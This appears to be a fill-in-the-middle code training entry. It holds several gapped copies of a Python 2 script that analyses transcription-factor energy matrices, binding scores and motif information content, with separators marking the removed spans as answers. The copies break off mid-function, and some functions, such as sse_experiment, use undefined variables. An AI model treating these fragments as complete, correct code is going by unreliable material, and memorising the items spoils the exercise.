for i in xrange(len(matrix)):
specific_binding += matrix[i][base_dict[seq[i]]]
if ns:
return log(exp(-beta*specific_binding) + exp(-beta*ns_binding_const))/-beta
else:
return specific_binding
def matrix_mean(matrix):
"""Return the mean score for the energy matrix"""
return sum(map(mean,matrix))
def matrix_variance(matrix):
"""Return the variance of the scores for the energy matrix"""
return sum(map(lambda row:variance(row,correct=False),matrix))
def matrix_sd(matrix):
return sqrt(matrix_variance(matrix))
def specific_binding_fraction(matrix,n=10000):
"""What fraction of the time does the tf bind specifically (i.e. < -8kbt)
to a random site?"""
return mean([score(matrix,random_site(10)) < -8 for i in xrange(n)])
def predict_mean_prop(matrix,ns=True):
"""estimate <exp(-beta*score(matrix,site))>
ns: non-specific binding"""
return (product([mean([exp(-beta*ep) for ep in col]) for col in matrix]) +
(exp(-beta*(-8)) if ns else 0)) # kbT
def predict_variance_prop(matrix):
"""estimate Var(exp(-beta*score(matrix,site)))"""
# See: The Variance of the Product of K Random Variables
# Leo A. Goodman
# Page 55 of 54-60
# However, first line of equation 1 is /wrong/. Should be:
# product(e_of_sqs) - product(esqs), not sum...
# expectation of square
e_of_sqs = [mean([exp(-beta*ep)**2 for ep in col]) for col in matrix]
# square of expectation
esqs = [mean([exp(-beta*ep) for ep in col])**2 for col in matrix]
return product(e_of_sqs) - product(esqs)
def predict_z(matrix,num_sites,ns=True):
return predict_mean_prop(matrix,ns=ns) * num_sites
def predict_z_variance(matrix,num_sites):
return predict_variance_prop(matrix) * num_sites
def mean_variance_plot(filename=None):
means = map(matrix_mean,energy_matrices)
variances = map(matrix_variance,energy_matrices)
plt.scatter(ks,means,label="Mean")
plt.scatter(ks,variances,label="Variance",color='g')
mean_regression = lambda x:poly1d(polyfit(map(log,ks),means,1))(log(x))
variance_regression = lambda x:poly1d(polyfit(map(log,ks),variances,1))(log(x))
plt.plot(*pl(mean_regression,map(iota,range(1,65))))
plt.plot(*pl(variance_regression,map(iota,range(1,65))))
plt.semilogx()
plt.xlabel("Copy Number")
plt.ylabel("kBT,(kBT)^2")
plt.legend(loc=0)
if filename:
plt.savefig(filename,dpi=400)
else:
plt.show()
def specific_binding_fraction_plot(filename=None):
binding_fractions = map(specific_binding_fraction,verbose_gen(energy_matrices))
plt.scatter(ks,binding_fractions)
plt.xlabel("Copy Number")
plt.ylabel("Specific binding fraction")
plt.loglog()
if filename:
plt.savefig(filename,dpi=400)
else:
plt.show()
def max_16_ic(matrix,n=100000):
"""
Compute motif_ic of top 16 of n random sites
"""
width = len(matrix)
sites = [random_site(width) for i in xrange(n)]
scores = map(lambda site:score(matrix,site),sites)
top16 = map(first,sorted(zip(sites,scores),key=lambda(site,score):score)[:16])
return motif_ic(top16)
def matrix_as_psfm(matrix):
"""
convert energy to psfm, assuming uniform probabilities
DEPRECATED: INCOMPLETE
"""
return [[2**(ep-2) for ep in row] for row in matrix]
def | (matrix,n,G,alpha):
"""See blue notebook: 6/27/13"""
#constant which does not depend on sites, matrix
C = 1/beta * log(n/G*(1-alpha)/alpha)
Zb = predict_z(matrix,G)
omega = Zb/G
return C - (1/beta * log(omega))
def predict_zf(matrix,n,G,alpha):
"""Predict sum_{i=1}^n exp(-\beta*E(s))"""
ep_f = predict_site_energy(matrix,n,G,alpha)
return n*exp(-beta*ep_f)
C = 1/beta * (log(n/G*(1-alpha)/alpha) + L * log(4))
def site_error(matrix,site):
"""Compute error for site, given matrix"""
return (score(matrix,site,ns=False)
- C
+ 1/beta * sum([log(sum([exp(-beta*matrix[i][base_dict[b]])
for b in "ACGT"]))
for i in range(L)]))
def site_error_optimized(matrix,site):
"""Compute error for site, given matrix"""
return score(matrix,site,ns=False) - C
def sse(matrix,motif):
"""Compute sum of squared error for matrix and motif"""
return sum([site_error(matrix,site)**2
for site in motif])
def sse_optimized(matrix,motif):
"""Compute sum of squared error for matrix and motif"""
#Hoisted computation of K out of site_error
K = 1/beta * sum([log(sum([exp(-beta*matrix[i][base_dict[b]])
for b in "ACGT"]))
for i in range(L)])
return sum([(site_error_optimized(matrix,site)+K)**2
for site in motif])
def sse_experiment(motif):
"""Given a collection of sites, can we find a corresponding energy
matrix by gradient descent on sum of squared errors?"""
L = len(matrix)
n = len(motif)
G = 100000.0
alpha = 0.9
def partial_site_error(matrix,site,i,b):
return 2*site_error(matrix,site)*(int(site[i] == b)
- (exp(-beta*matrix[i][base_dict[b]])
/sum([exp(-beta*matrix[i][base_dict[c]])
for c in "ACGT"])))
def partial_sse(matrix,i,b):
return sum([2*site_error(matrix,site)*partial_site_error(matrix,site,i,b)
for site in motif])
def jacobian(matrix):
return [[partial_sse(matrix,i,b) for b in "ACGT"] for i in range(L)]
def grad_desc(matrix,max_its=1000):
step = 0.0001
tolerance = 0.001
current_sse = sse(matrix)
print current_sse
its = 0 # iterations
sses = []
while current_sse > tolerance and its < max_its:
j = jacobian(matrix)
#print j
matrix = matrix_add(matrix,matrix_scalar_mult(-step,j))
current_sse = sse(matrix)
print its,current_sse #,[score(matrix,site,ns=False) for site in motif]
#print matrix
its += 1
sses.append(current_sse)
return matrix,sses
print matrix,motif
return grad_desc([[0]*4 for i in range(L)])
def mutate_matrix(matrix):
"""Mutate the matrix by perturbing one weight by a standard normal"""
L = len(matrix)
r_i = random.randrange(L)
r_j = random.randrange(4)
r = random.gauss(0,1)
return [[matrix[i][j]+r*(i==r_i)*(j==r_j)
for j in range(4)] for i in range(L)]
def propose(matrix,motif):
"""Return a candidate (S,R) system by mutating either the motif or
the matrix"""
if random.random() < 0.5:
return matrix,mutate_motif(motif)
else:
return mutate_matrix(matrix),motif
def mh_experiment(text="",filename=None):
"""Metropolis-Hastings sampling for SSE of (S,R) systems"""
motif = [random_site(L) for i in range(n)]
matrix = [[0,0,0,0] for i in range(L)]
xs = mh(lambda(matrix,motif):exp(-sse_optimized(matrix,motif)),
lambda(matrix,motif):propose(matrix,motif),
(matrix,motif),
verbose=True,
iterations=50000)
sses = [sse_optimized(matrix,motif)
for (matrix,motif) in verbose_gen(xs,modulus=1000)]
ics = [motif_ic(motif) for (matrix,motif) in verbose_gen(xs,modulus=1000)]
ginis = [motif_gini(motif) for (matrix,motif) in verbose_gen(xs,modulus=1000)]
plt.scatter(ics,sses)
plt.xlabel("Motif Information Content (bits)")
plt.ylabel("Sum Squared Error")
plt.title("Motif IC vs. Sum Squared error: %s " % text)
maybesave(filename)
def ic_vs_gini_scatterplot_exp(trials=100,stopping_crit=1,filename=None):
# redo this properly!
matrix = [[0,0,0,0] for i in range(L)]
motif = [random_site(L) for i in range(n)]
# xs = mh(lambda(matrix,motif):exp(-sse_optimized(matrix,motif)),
# lambda(matrix,motif):propose(matrix,motif),
# (matrix,motif),
# verbose=True,
# iterations=50000,every=100)
scale = 0.01 #use this to prevent overflows in anneal
scaled_sse = lambda(matrix,motif):sse_optimized(matrix,motif)*scale
annealed_system = lambda: anneal(scaled_sse,
lambda(matrix,motif):propose(matrix,motif),
(matrix,motif),
iterations=100000,
stopping_crit = stopping_crit*scale)
xs = [annealed_system() for i in verbose_gen(xrange(trials))]
ginis = [motif_gini(motif)
for (matrix,motif) in verbose_gen(xs,modulus=1000)]
ics = [motif_ic(motif) for (matrix,motif) in verbose_gen(xs,
modulus=1000)]
sa_motifs = [sa_motif_with_desired_ic(ic,0.1,16,10)
for ic in verbose_gen(ics)]
greedy_motifs = [generate_greedy_motif_with_ic(ic,0.1,16,10)
for ic in verbose_gen(ics)]
sa_ics = [motif_ic(motif) for motif in sa_motifs]
sa_ginis = [motif_gini(motif) for motif in sa_motifs]
greedy_ics = [motif_ic(motif) for motif in greedy_motifs]
greedy_ginis = [motif_gini(motif) for motif in greedy_motifs]
plt.scatter(ics,ginis,color='b',label="Systems")
plt.scatter(sa_ics,sa_ginis,color='r',label="MCMC")
plt.scatter(greedy_ics,greedy_ginis,color='g',label="Greedy")
print "Systems vs. SA motifs:",wilcoxon(ginis,sa_ginis)
print "Systems vs. greedy motifs:",wilcoxon(ginis,greedy_ginis)
print "Greedy vs. sa motifs:",wilcoxon(sa_ginis,greedy_ginis)
# Systems vs. SA motifs: (75677.0, 2.1175931461637028e-81)
# Systems vs. greedy motifs: (78734.0, 1.2196302463732947e-78)
# Greedy vs. sa motifs: (247043.0, 0.72555385752004398)
maybesave(filename)
print "loaded energy_matrix_analysis"
def mr_pairs_have_less_mi_exp(filename=None):
"""Motifs evolved as M-R pairs have less MI than random motifs
with the same IC"""
trials = 500
matrix = [[0,0,0,0] for i in range(L)]
motif = [random_site(L) for i in range(n)]
scale = 0.01 #use this to prevent overflows in anneal
scaled_sse = lambda(matrix,motif):sse_optimized(matrix,motif)*scale
annealed_system = lambda :anneal(scaled_sse,
lambda(matrix,motif):propose(matrix,motif),
(matrix,motif),
verbose=True,
iterations=100000,
stopping_crit = 0.1*scale)
systems = [annealed_system() for i in xrange(500)]
motifs = map(second,systems)
ics = map(motif_ic,motifs)
control_motifs = [sa_motif_with_desired_ic(ic,0.1,n,L) for ic in verbose_gen(ics)]
mis = map(total_motif_mi,motifs)
control_mis = map(total_motif_mi,control_motifs)
plt.scatter(mis,control_mis)
plt.xlabel("M-R System Mutual Information (bits)")
plt.ylabel("Annealed Motif Mutual Information (bits)")
plt.plot([0,5],[0,5])
maybesave(filename)
#mannwhitneyu(mis,control_mis) -> (47673.0, 1.2864021557444156e-64)
return mis,control_mis
| predict_site_energy | identifier_name |
energy_matrix_analysis.py | """
We wish to explore the relationship between copy number and various
energy matrix statistics, such as disorder (i.e. standard deviation of
score).
"""
from utils import *
from parse_energy_matrices import parse_energy_matrices
from scipy.stats import wilcoxon
#energy_matrices = parse_energy_matrices("energy_matrices.txt")
beta = 1.61
n = 16
G = 100000.0
alpha = 0.5
L = 10
ns_binding_const = -8
base_dict = {b:i for i,b in enumerate("ACGT")}
def score_ref(matrix,seq,ns=True):
"""Score a sequence with a motif. This is a reference
implementation. See score for production implementation"""
specific_binding = sum([row[base_dict[b]] for row,b in zip(matrix,seq)])
if ns:
return log(exp(-beta*specific_binding) + exp(-beta*ns_binding_const))/-beta
else:
return specific_binding
def score(matrix,seq,ns=True):
"""Score a sequence with a motif."""
#specific_binding = sum([row[base_dict[b]] for row,b in zip(matrix,seq)])
specific_binding = 0
for i in xrange(len(matrix)):
specific_binding += matrix[i][base_dict[seq[i]]]
if ns:
return log(exp(-beta*specific_binding) + exp(-beta*ns_binding_const))/-beta
else:
|
def matrix_mean(matrix):
"""Return the mean score for the energy matrix"""
return sum(map(mean,matrix))
def matrix_variance(matrix):
"""Return the variance of the scores for the energy matrix"""
return sum(map(lambda row:variance(row,correct=False),matrix))
def matrix_sd(matrix):
return sqrt(matrix_variance(matrix))
def specific_binding_fraction(matrix,n=10000):
"""What fraction of the time does the tf bind specifically (i.e. < -8kbt)
to a random site?"""
return mean([score(matrix,random_site(10)) < -8 for i in xrange(n)])
def predict_mean_prop(matrix,ns=True):
"""estimate <exp(-beta*score(matrix,site))>
ns: non-specific binding"""
return (product([mean([exp(-beta*ep) for ep in col]) for col in matrix]) +
(exp(-beta*(-8)) if ns else 0)) # kbT
def predict_variance_prop(matrix):
"""estimate Var(exp(-beta*score(matrix,site)))"""
# See: The Variance of the Product of K Random Variables
# Leo A. Goodman
# Page 55 of 54-60
# However, first line of equation 1 is /wrong/. Should be:
# product(e_of_sqs) - product(esqs), not sum...
# expectation of square
e_of_sqs = [mean([exp(-beta*ep)**2 for ep in col]) for col in matrix]
# square of expectation
esqs = [mean([exp(-beta*ep) for ep in col])**2 for col in matrix]
return product(e_of_sqs) - product(esqs)
def predict_z(matrix,num_sites,ns=True):
return predict_mean_prop(matrix,ns=ns) * num_sites
def predict_z_variance(matrix,num_sites):
return predict_variance_prop(matrix) * num_sites
def mean_variance_plot(filename=None):
means = map(matrix_mean,energy_matrices)
variances = map(matrix_variance,energy_matrices)
plt.scatter(ks,means,label="Mean")
plt.scatter(ks,variances,label="Variance",color='g')
mean_regression = lambda x:poly1d(polyfit(map(log,ks),means,1))(log(x))
variance_regression = lambda x:poly1d(polyfit(map(log,ks),variances,1))(log(x))
plt.plot(*pl(mean_regression,map(iota,range(1,65))))
plt.plot(*pl(variance_regression,map(iota,range(1,65))))
plt.semilogx()
plt.xlabel("Copy Number")
plt.ylabel("kBT,(kBT)^2")
plt.legend(loc=0)
if filename:
plt.savefig(filename,dpi=400)
else:
plt.show()
def specific_binding_fraction_plot(filename=None):
binding_fractions = map(specific_binding_fraction,verbose_gen(energy_matrices))
plt.scatter(ks,binding_fractions)
plt.xlabel("Copy Number")
plt.ylabel("Specific binding fraction")
plt.loglog()
if filename:
plt.savefig(filename,dpi=400)
else:
plt.show()
def max_16_ic(matrix,n=100000):
"""
Compute motif_ic of top 16 of n random sites
"""
width = len(matrix)
sites = [random_site(width) for i in xrange(n)]
scores = map(lambda site:score(matrix,site),sites)
top16 = map(first,sorted(zip(sites,scores),key=lambda(site,score):score)[:16])
return motif_ic(top16)
def matrix_as_psfm(matrix):
"""
convert energy to psfm, assuming uniform probabilities
DEPRECATED: INCOMPLETE
"""
return [[2**(ep-2) for ep in row] for row in matrix]
def predict_site_energy(matrix,n,G,alpha):
"""See blue notebook: 6/27/13"""
#constant which does not depend on sites, matrix
C = 1/beta * log(n/G*(1-alpha)/alpha)
Zb = predict_z(matrix,G)
omega = Zb/G
return C - (1/beta * log(omega))
def predict_zf(matrix,n,G,alpha):
"""Predict sum_{i=1}^n exp(-\beta*E(s))"""
ep_f = predict_site_energy(matrix,n,G,alpha)
return n*exp(-beta*ep_f)
C = 1/beta * (log(n/G*(1-alpha)/alpha) + L * log(4))
def site_error(matrix,site):
"""Compute error for site, given matrix"""
return (score(matrix,site,ns=False)
- C
+ 1/beta * sum([log(sum([exp(-beta*matrix[i][base_dict[b]])
for b in "ACGT"]))
for i in range(L)]))
def site_error_optimized(matrix,site):
"""Compute error for site, given matrix"""
return score(matrix,site,ns=False) - C
def sse(matrix,motif):
"""Compute sum of squared error for matrix and motif"""
return sum([site_error(matrix,site)**2
for site in motif])
def sse_optimized(matrix,motif):
"""Compute sum of squared error for matrix and motif"""
#Hoisted computation of K out of site_error
K = 1/beta * sum([log(sum([exp(-beta*matrix[i][base_dict[b]])
for b in "ACGT"]))
for i in range(L)])
return sum([(site_error_optimized(matrix,site)+K)**2
for site in motif])
def sse_experiment(motif):
"""Given a collection of sites, can we find a corresponding energy
matrix by gradient descent on sum of squared errors?"""
L = len(matrix)
n = len(motif)
G = 100000.0
alpha = 0.9
def partial_site_error(matrix,site,i,b):
return 2*site_error(matrix,site)*(int(site[i] == b)
- (exp(-beta*matrix[i][base_dict[b]])
/sum([exp(-beta*matrix[i][base_dict[c]])
for c in "ACGT"])))
def partial_sse(matrix,i,b):
return sum([2*site_error(matrix,site)*partial_site_error(matrix,site,i,b)
for site in motif])
def jacobian(matrix):
return [[partial_sse(matrix,i,b) for b in "ACGT"] for i in range(L)]
def grad_desc(matrix,max_its=1000):
step = 0.0001
tolerance = 0.001
current_sse = sse(matrix)
print current_sse
its = 0 # iterations
sses = []
while current_sse > tolerance and its < max_its:
j = jacobian(matrix)
#print j
matrix = matrix_add(matrix,matrix_scalar_mult(-step,j))
current_sse = sse(matrix)
print its,current_sse #,[score(matrix,site,ns=False) for site in motif]
#print matrix
its += 1
sses.append(current_sse)
return matrix,sses
print matrix,motif
return grad_desc([[0]*4 for i in range(L)])
def mutate_matrix(matrix):
"""Mutate the matrix by perturbing one weight by a standard normal"""
L = len(matrix)
r_i = random.randrange(L)
r_j = random.randrange(4)
r = random.gauss(0,1)
return [[matrix[i][j]+r*(i==r_i)*(j==r_j)
for j in range(4)] for i in range(L)]
def propose(matrix,motif):
"""Return a candidate (S,R) system by mutating either the motif or
the matrix"""
if random.random() < 0.5:
return matrix,mutate_motif(motif)
else:
return mutate_matrix(matrix),motif
def mh_experiment(text="",filename=None):
"""Metropolis-Hastings sampling for SSE of (S,R) systems"""
motif = [random_site(L) for i in range(n)]
matrix = [[0,0,0,0] for i in range(L)]
xs = mh(lambda(matrix,motif):exp(-sse_optimized(matrix,motif)),
lambda(matrix,motif):propose(matrix,motif),
(matrix,motif),
verbose=True,
iterations=50000)
sses = [sse_optimized(matrix,motif)
for (matrix,motif) in verbose_gen(xs,modulus=1000)]
ics = [motif_ic(motif) for (matrix,motif) in verbose_gen(xs,modulus=1000)]
ginis = [motif_gini(motif) for (matrix,motif) in verbose_gen(xs,modulus=1000)]
plt.scatter(ics,sses)
plt.xlabel("Motif Information Content (bits)")
plt.ylabel("Sum Squared Error")
plt.title("Motif IC vs. Sum Squared error: %s " % text)
maybesave(filename)
def ic_vs_gini_scatterplot_exp(trials=100,stopping_crit=1,filename=None):
# redo this properly!
matrix = [[0,0,0,0] for i in range(L)]
motif = [random_site(L) for i in range(n)]
# xs = mh(lambda(matrix,motif):exp(-sse_optimized(matrix,motif)),
# lambda(matrix,motif):propose(matrix,motif),
# (matrix,motif),
# verbose=True,
# iterations=50000,every=100)
scale = 0.01 #use this to prevent overflows in anneal
scaled_sse = lambda(matrix,motif):sse_optimized(matrix,motif)*scale
annealed_system = lambda: anneal(scaled_sse,
lambda(matrix,motif):propose(matrix,motif),
(matrix,motif),
iterations=100000,
stopping_crit = stopping_crit*scale)
xs = [annealed_system() for i in verbose_gen(xrange(trials))]
ginis = [motif_gini(motif)
for (matrix,motif) in verbose_gen(xs,modulus=1000)]
ics = [motif_ic(motif) for (matrix,motif) in verbose_gen(xs,
modulus=1000)]
sa_motifs = [sa_motif_with_desired_ic(ic,0.1,16,10)
for ic in verbose_gen(ics)]
greedy_motifs = [generate_greedy_motif_with_ic(ic,0.1,16,10)
for ic in verbose_gen(ics)]
sa_ics = [motif_ic(motif) for motif in sa_motifs]
sa_ginis = [motif_gini(motif) for motif in sa_motifs]
greedy_ics = [motif_ic(motif) for motif in greedy_motifs]
greedy_ginis = [motif_gini(motif) for motif in greedy_motifs]
plt.scatter(ics,ginis,color='b',label="Systems")
plt.scatter(sa_ics,sa_ginis,color='r',label="MCMC")
plt.scatter(greedy_ics,greedy_ginis,color='g',label="Greedy")
print "Systems vs. SA motifs:",wilcoxon(ginis,sa_ginis)
print "Systems vs. greedy motifs:",wilcoxon(ginis,greedy_ginis)
print "Greedy vs. sa motifs:",wilcoxon(sa_ginis,greedy_ginis)
# Systems vs. SA motifs: (75677.0, 2.1175931461637028e-81)
# Systems vs. greedy motifs: (78734.0, 1.2196302463732947e-78)
# Greedy vs. sa motifs: (247043.0, 0.72555385752004398)
maybesave(filename)
print "loaded energy_matrix_analysis"
def mr_pairs_have_less_mi_exp(filename=None):
"""Motifs evolved as M-R pairs have less MI than random motifs
with the same IC"""
trials = 500
matrix = [[0,0,0,0] for i in range(L)]
motif = [random_site(L) for i in range(n)]
scale = 0.01 #use this to prevent overflows in anneal
scaled_sse = lambda(matrix,motif):sse_optimized(matrix,motif)*scale
annealed_system = lambda :anneal(scaled_sse,
lambda(matrix,motif):propose(matrix,motif),
(matrix,motif),
verbose=True,
iterations=100000,
stopping_crit = 0.1*scale)
systems = [annealed_system() for i in xrange(500)]
motifs = map(second,systems)
ics = map(motif_ic,motifs)
control_motifs = [sa_motif_with_desired_ic(ic,0.1,n,L) for ic in verbose_gen(ics)]
mis = map(total_motif_mi,motifs)
control_mis = map(total_motif_mi,control_motifs)
plt.scatter(mis,control_mis)
plt.xlabel("M-R System Mutual Information (bits)")
plt.ylabel("Annealed Motif Mutual Information (bits)")
plt.plot([0,5],[0,5])
maybesave(filename)
#mannwhitneyu(mis,control_mis) -> (47673.0, 1.2864021557444156e-64)
return mis,control_mis
| return specific_binding | conditional_block |
energy_matrix_analysis.py | """
We wish to explore the relationship between copy number and various
energy matrix statistics, such as disorder (i.e. standard deviation of
score).
"""
from utils import *
from parse_energy_matrices import parse_energy_matrices
from scipy.stats import wilcoxon
#energy_matrices = parse_energy_matrices("energy_matrices.txt")
beta = 1.61
n = 16
G = 100000.0
alpha = 0.5
L = 10
ns_binding_const = -8
base_dict = {b:i for i,b in enumerate("ACGT")}
def score_ref(matrix,seq,ns=True):
"""Score a sequence with a motif. This is a reference
implementation. See score for production implementation"""
specific_binding = sum([row[base_dict[b]] for row,b in zip(matrix,seq)])
if ns:
return log(exp(-beta*specific_binding) + exp(-beta*ns_binding_const))/-beta
else:
return specific_binding
def score(matrix,seq,ns=True):
"""Score a sequence with a motif."""
#specific_binding = sum([row[base_dict[b]] for row,b in zip(matrix,seq)])
specific_binding = 0
for i in xrange(len(matrix)):
specific_binding += matrix[i][base_dict[seq[i]]]
if ns:
return log(exp(-beta*specific_binding) + exp(-beta*ns_binding_const))/-beta
else:
return specific_binding
def matrix_mean(matrix):
"""Return the mean score for the energy matrix"""
return sum(map(mean,matrix))
def matrix_variance(matrix):
"""Return the variance of the scores for the energy matrix"""
return sum(map(lambda row:variance(row,correct=False),matrix))
def matrix_sd(matrix):
return sqrt(matrix_variance(matrix))
def specific_binding_fraction(matrix,n=10000):
"""What fraction of the time does the tf bind specifically (i.e. < -8kbt)
to a random site?"""
return mean([score(matrix,random_site(10)) < -8 for i in xrange(n)])
def predict_mean_prop(matrix,ns=True):
"""estimate <exp(-beta*score(matrix,site))>
ns: non-specific binding"""
return (product([mean([exp(-beta*ep) for ep in col]) for col in matrix]) +
(exp(-beta*(-8)) if ns else 0)) # kbT
def predict_variance_prop(matrix):
"""estimate Var(exp(-beta*score(matrix,site)))"""
# See: The Variance of the Product of K Random Variables
# Leo A. Goodman
# Page 55 of 54-60
# However, first line of equation 1 is /wrong/. Should be:
# product(e_of_sqs) - product(esqs), not sum...
# expectation of square
e_of_sqs = [mean([exp(-beta*ep)**2 for ep in col]) for col in matrix]
# square of expectation
esqs = [mean([exp(-beta*ep) for ep in col])**2 for col in matrix]
return product(e_of_sqs) - product(esqs)
def predict_z(matrix,num_sites,ns=True):
return predict_mean_prop(matrix,ns=ns) * num_sites
def predict_z_variance(matrix,num_sites):
return predict_variance_prop(matrix) * num_sites
def mean_variance_plot(filename=None):
means = map(matrix_mean,energy_matrices)
variances = map(matrix_variance,energy_matrices)
plt.scatter(ks,means,label="Mean")
plt.scatter(ks,variances,label="Variance",color='g')
mean_regression = lambda x:poly1d(polyfit(map(log,ks),means,1))(log(x))
variance_regression = lambda x:poly1d(polyfit(map(log,ks),variances,1))(log(x))
plt.plot(*pl(mean_regression,map(iota,range(1,65))))
plt.plot(*pl(variance_regression,map(iota,range(1,65))))
plt.semilogx()
plt.xlabel("Copy Number")
plt.ylabel("kBT,(kBT)^2")
plt.legend(loc=0)
if filename:
plt.savefig(filename,dpi=400)
else:
plt.show()
def specific_binding_fraction_plot(filename=None):
binding_fractions = map(specific_binding_fraction,verbose_gen(energy_matrices))
plt.scatter(ks,binding_fractions)
plt.xlabel("Copy Number")
plt.ylabel("Specific binding fraction")
plt.loglog()
if filename:
plt.savefig(filename,dpi=400)
else:
plt.show()
def max_16_ic(matrix,n=100000):
"""
Compute motif_ic of top 16 of n random sites
"""
width = len(matrix)
sites = [random_site(width) for i in xrange(n)]
scores = map(lambda site:score(matrix,site),sites)
top16 = map(first,sorted(zip(sites,scores),key=lambda(site,score):score)[:16])
return motif_ic(top16)
def matrix_as_psfm(matrix):
"""
convert energy to psfm, assuming uniform probabilities
DEPRECATED: INCOMPLETE
"""
return [[2**(ep-2) for ep in row] for row in matrix]
def predict_site_energy(matrix,n,G,alpha):
"""See blue notebook: 6/27/13"""
#constant which does not depend on sites, matrix
C = 1/beta * log(n/G*(1-alpha)/alpha)
Zb = predict_z(matrix,G)
omega = Zb/G
return C - (1/beta * log(omega))
def predict_zf(matrix,n,G,alpha):
"""Predict sum_{i=1}^n exp(-\beta*E(s))"""
ep_f = predict_site_energy(matrix,n,G,alpha)
return n*exp(-beta*ep_f)
C = 1/beta * (log(n/G*(1-alpha)/alpha) + L * log(4))
def site_error(matrix,site):
"""Compute error for site, given matrix"""
return (score(matrix,site,ns=False)
- C
+ 1/beta * sum([log(sum([exp(-beta*matrix[i][base_dict[b]])
for b in "ACGT"]))
for i in range(L)]))
def site_error_optimized(matrix,site):
|
def sse(matrix,motif):
"""Compute sum of squared error for matrix and motif"""
return sum([site_error(matrix,site)**2
for site in motif])
def sse_optimized(matrix,motif):
"""Compute sum of squared error for matrix and motif"""
#Hoisted computation of K out of site_error
K = 1/beta * sum([log(sum([exp(-beta*matrix[i][base_dict[b]])
for b in "ACGT"]))
for i in range(L)])
return sum([(site_error_optimized(matrix,site)+K)**2
for site in motif])
def sse_experiment(motif):
"""Given a collection of sites, can we find a corresponding energy
matrix by gradient descent on sum of squared errors?"""
L = len(matrix)
n = len(motif)
G = 100000.0
alpha = 0.9
def partial_site_error(matrix,site,i,b):
return 2*site_error(matrix,site)*(int(site[i] == b)
- (exp(-beta*matrix[i][base_dict[b]])
/sum([exp(-beta*matrix[i][base_dict[c]])
for c in "ACGT"])))
def partial_sse(matrix,i,b):
return sum([2*site_error(matrix,site)*partial_site_error(matrix,site,i,b)
for site in motif])
def jacobian(matrix):
return [[partial_sse(matrix,i,b) for b in "ACGT"] for i in range(L)]
def grad_desc(matrix,max_its=1000):
step = 0.0001
tolerance = 0.001
current_sse = sse(matrix)
print current_sse
its = 0 # iterations
sses = []
while current_sse > tolerance and its < max_its:
j = jacobian(matrix)
#print j
matrix = matrix_add(matrix,matrix_scalar_mult(-step,j))
current_sse = sse(matrix)
print its,current_sse #,[score(matrix,site,ns=False) for site in motif]
#print matrix
its += 1
sses.append(current_sse)
return matrix,sses
print matrix,motif
return grad_desc([[0]*4 for i in range(L)])
def mutate_matrix(matrix):
"""Mutate the matrix by perturbing one weight by a standard normal"""
L = len(matrix)
r_i = random.randrange(L)
r_j = random.randrange(4)
r = random.gauss(0,1)
return [[matrix[i][j]+r*(i==r_i)*(j==r_j)
for j in range(4)] for i in range(L)]
def propose(matrix,motif):
"""Return a candidate (S,R) system by mutating either the motif or
the matrix"""
if random.random() < 0.5:
return matrix,mutate_motif(motif)
else:
return mutate_matrix(matrix),motif
def mh_experiment(text="",filename=None):
"""Metropolis-Hastings sampling for SSE of (S,R) systems"""
motif = [random_site(L) for i in range(n)]
matrix = [[0,0,0,0] for i in range(L)]
xs = mh(lambda(matrix,motif):exp(-sse_optimized(matrix,motif)),
lambda(matrix,motif):propose(matrix,motif),
(matrix,motif),
verbose=True,
iterations=50000)
sses = [sse_optimized(matrix,motif)
for (matrix,motif) in verbose_gen(xs,modulus=1000)]
ics = [motif_ic(motif) for (matrix,motif) in verbose_gen(xs,modulus=1000)]
ginis = [motif_gini(motif) for (matrix,motif) in verbose_gen(xs,modulus=1000)]
plt.scatter(ics,sses)
plt.xlabel("Motif Information Content (bits)")
plt.ylabel("Sum Squared Error")
plt.title("Motif IC vs. Sum Squared error: %s " % text)
maybesave(filename)
def ic_vs_gini_scatterplot_exp(trials=100,stopping_crit=1,filename=None):
# redo this properly!
matrix = [[0,0,0,0] for i in range(L)]
motif = [random_site(L) for i in range(n)]
# xs = mh(lambda(matrix,motif):exp(-sse_optimized(matrix,motif)),
# lambda(matrix,motif):propose(matrix,motif),
# (matrix,motif),
# verbose=True,
# iterations=50000,every=100)
scale = 0.01 #use this to prevent overflows in anneal
scaled_sse = lambda(matrix,motif):sse_optimized(matrix,motif)*scale
annealed_system = lambda: anneal(scaled_sse,
lambda(matrix,motif):propose(matrix,motif),
(matrix,motif),
iterations=100000,
stopping_crit = stopping_crit*scale)
xs = [annealed_system() for i in verbose_gen(xrange(trials))]
ginis = [motif_gini(motif)
for (matrix,motif) in verbose_gen(xs,modulus=1000)]
ics = [motif_ic(motif) for (matrix,motif) in verbose_gen(xs,
modulus=1000)]
sa_motifs = [sa_motif_with_desired_ic(ic,0.1,16,10)
for ic in verbose_gen(ics)]
greedy_motifs = [generate_greedy_motif_with_ic(ic,0.1,16,10)
for ic in verbose_gen(ics)]
sa_ics = [motif_ic(motif) for motif in sa_motifs]
sa_ginis = [motif_gini(motif) for motif in sa_motifs]
greedy_ics = [motif_ic(motif) for motif in greedy_motifs]
greedy_ginis = [motif_gini(motif) for motif in greedy_motifs]
plt.scatter(ics,ginis,color='b',label="Systems")
plt.scatter(sa_ics,sa_ginis,color='r',label="MCMC")
plt.scatter(greedy_ics,greedy_ginis,color='g',label="Greedy")
print "Systems vs. SA motifs:",wilcoxon(ginis,sa_ginis)
print "Systems vs. greedy motifs:",wilcoxon(ginis,greedy_ginis)
print "Greedy vs. sa motifs:",wilcoxon(sa_ginis,greedy_ginis)
# Systems vs. SA motifs: (75677.0, 2.1175931461637028e-81)
# Systems vs. greedy motifs: (78734.0, 1.2196302463732947e-78)
# Greedy vs. sa motifs: (247043.0, 0.72555385752004398)
maybesave(filename)
print "loaded energy_matrix_analysis"
def mr_pairs_have_less_mi_exp(filename=None):
"""Motifs evolved as M-R pairs have less MI than random motifs
with the same IC"""
trials = 500
matrix = [[0,0,0,0] for i in range(L)]
motif = [random_site(L) for i in range(n)]
scale = 0.01 #use this to prevent overflows in anneal
scaled_sse = lambda(matrix,motif):sse_optimized(matrix,motif)*scale
annealed_system = lambda :anneal(scaled_sse,
lambda(matrix,motif):propose(matrix,motif),
(matrix,motif),
verbose=True,
iterations=100000,
stopping_crit = 0.1*scale)
systems = [annealed_system() for i in xrange(500)]
motifs = map(second,systems)
ics = map(motif_ic,motifs)
control_motifs = [sa_motif_with_desired_ic(ic,0.1,n,L) for ic in verbose_gen(ics)]
mis = map(total_motif_mi,motifs)
control_mis = map(total_motif_mi,control_motifs)
plt.scatter(mis,control_mis)
plt.xlabel("M-R System Mutual Information (bits)")
plt.ylabel("Annealed Motif Mutual Information (bits)")
plt.plot([0,5],[0,5])
maybesave(filename)
